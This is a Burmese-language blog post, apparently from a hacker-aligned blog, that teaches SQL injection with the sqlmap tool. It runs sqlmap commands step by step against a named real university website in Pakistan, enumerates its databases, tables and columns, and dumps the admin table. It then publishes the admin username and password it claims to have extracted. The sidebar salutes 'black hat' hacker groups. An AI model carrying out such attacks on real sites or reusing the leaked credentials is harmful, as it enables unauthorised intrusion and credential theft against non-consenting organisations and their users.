SQL Map



SQL Map ကို Python နဲ ့ develop လုပ္ထားျပီးေတာ့ Backtrack 5, Backtrack 5 R1 အပါအ၀င္ Backtrack Version အားလံုးမွာ ပါ၀င္တဲ့ အေကာင္းဆံုး SQL injection tool တစ္ခုပါ။ သူက database တစ္ခုလံုးကုိ takeover လုပ္လို ့ရတဲ့ powerful tool တစ္ခုလည္းျဖစ္ပါတယ္။



အရင္ဆံုး Vulnerable terget တစ္ခု လိုအပ္ပါတယ္ ။
(က်ေနာ္ကေတာ့ http://www.hu.edu.pk/viewfaculty.php?id=12 ဆိုတဲ့ Pakistan Site တစ္ခုနဲ ့ဥပမာေပးျပီး ရွင္းျပေပးသြားပါမယ္။)



Backtrack terminal ထဲကို သြားျပီးေတာ့  cd/pentest/database/sqlmap လို ့ရိုက္ထည့္လိုက္ပါ။



Sqlmap ကို run ဖို ့အတြက္ သံုးရမယ့္ command ေတြကေတာ့

(-u ဆိုတာက vulnerable url)

သို ့မဟုတ္
 ./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 --current-db
တကယ္လို ့ --dbs လို ့အသံုးျပဳရင္ေတာ့ server ထဲမွာ ရွိတဲ့ database အားလံုးကို fetch လုပ္မွာျဖစ္ျပီး
-- current-db ဆိုရင္ေတာ့ current website နဲ ့ related ျဖစ္တဲ့ database ကိုပဲ fetch လုပ္မွာျဖစ္ပါတယ္။ ဒါဆိုရင္ database name ကို ရမွာျဖစ္ပါတယ္။

./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 -D c3results –tables
ဒီမွာ -D ဆိုတာကေတာ့ database name နဲ ့ - tables ဆိုတာကေတာ့ current database ထဲမွာ ရွိတဲ့ tables ေတြကို fetch လုပ္ဖို ့ျဖစ္ျပီးေတာ့ table name ကို ရမွာျဖစ္ပါတယ္။
./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 -D c3results -T admin --columns
ဒါကေတာ့ table ထဲမွာ ရွိတဲ ့columns name ေတြကို ရယူဖို ့အတြက္ျဖစ္ျပီး

./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 -D c3results -T admin -C id,passwrd,u_name –dump
ဒါဆိုရင္ေတာ့ "admin" ဆိုတဲ့ table ထဲမွာရွိတဲ့ information အားလံုးကို ရျပီဆိုရင္ေတာ့ process အားလံုးျပီးျပီဗ်။

Database Name : c3results
No of tables :48
Admin Table Name : admin
admin username : 123_admin_123
admin password : 123_hazara_123


2 comments to "SQL Map"

  • အသစ္မွတ္လို႕ ခြီးလိုမွျဗဲး ..သီေပါးမင္း လက္ထက္ထည္းက နည္းၾကီးပဲ ဟ

  • ရွင္းျပထားတာအရမ္းေကာင္းပါတယ္။ BT နဲ႔ပတ္သက္ၿပီးေလ့လာခ်င္လို႕ BT အေၾကာင္းမ်ားမ်ားတင္ေပးပါ။

Post a Comment

သင့္ရဲ ့ comment မ်ားက ကြ်န္ေတာ္တို႔လို blogger ေတြ အတြက္ အားေဆးတစ္ခြက္ပါ။
ေကာင္းသည္၊ ဆုိးသည္ ေရးႏုိင္ပါသည္။ လိုအပ္သည္မ်ားကိုလည္းေဝဖန္အၾကံေပးႏုိင္ပါသည္။

Powered by Blogger.

About This Blog

Blogger Tips And Tricks|Latest Tips For Bloggers Free Backlinks

Respect List

Blink Hacker Group

Myanmar Hacker Uniteam

Brotherhood of Myanmar Hackers

and All Myanmar Attackers & All Myanmar Black Hats.

Popular Posts

Followers

စည္းလုံးျခင္းသံစဥ္ေရဒီယုိ

Web hosting for webmasters